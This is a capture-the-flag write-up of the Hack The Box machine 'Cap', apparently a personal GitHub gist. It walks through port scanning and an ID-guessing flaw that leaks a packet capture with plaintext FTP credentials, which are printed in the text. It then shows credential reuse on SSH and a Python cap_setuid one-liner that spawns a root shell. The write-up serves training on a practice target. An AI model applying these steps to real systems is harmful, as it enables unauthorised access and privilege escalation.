Skip to content

Instantly share code, notes, and snippets.

@0xEmbo

0xEmbo/Cap.md Secret

Created Aug 13, 2021
Embed
What would you like to do?

Foothold

10.10.10.245

Nmap

Not shown: 997 closed ports                                                               
PORT   STATE SERVICE VERSION                                                              
21/tcp open  ftp     vsftpd 3.0.3                                                         
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)         
80/tcp open  http    gunicorn                                           
<snip>

FTP (21)

Anonymous login not allowed.

Port 80

![[Pasted image 20210619055406.png]]

Seems that the server sniffs the packets between it and my pc for 5 seconds.. And notice the url http://10.10.10.245/data/11 ![[Pasted image 20210619055654.png]] When trying to change the value to something like 1 to get the first captured packets (maybe it contains ftp credentials). http://10.10.10.245/data/1 and downloaded the pcap file and opened it. ![[Pasted image 20210619060109.png]] ![[Pasted image 20210619060123.png]] Seems like there is nothing usefull here. So looking at the other pages..

It just executes ifconfig, nothing here too. ![[Pasted image 20210619060223.png]]

Here it executes netstat command which shows us the same result as our nmap scan, nothing useful too. ![[Pasted image 20210619060330.png]]

But after a second i just tried to put 0 instead of 1 (maybe the administrator of the server starts naming the pcap files from 0).

And that's true, i got a different file. So lets download it and filter with FTP. ![[Pasted image 20210619060617.png]]

And we got some packets that has username and password for FTP. ![[Pasted image 20210619060857.png]]

Lets login to FTP using these credentials (nathan:Buck3tH4TF0RM3!)

Logged in successfully! ![[Pasted image 20210619061050.png]]

Also DON'T FORGET to try same credentials on different services. ddd Trying save creds on SSH and successfully logged in.. ![[Pasted image 20210619063241.png]]

Privilege Escalation

Doing some enumeration, found interesting lines on /var/www/html/app.py os.setuid(0) needs root privileges to be executed but the file (app.py) is being run by user nathan. ![[Pasted image 20210619065359.png]] ![[Pasted image 20210619065005.png]]

So for sure python has cap_setuid capability. ![[Pasted image 20210619065305.png]] ![[Pasted image 20210619065814.png]]

Getting root

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

![[Pasted image 20210619070029.png]]

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment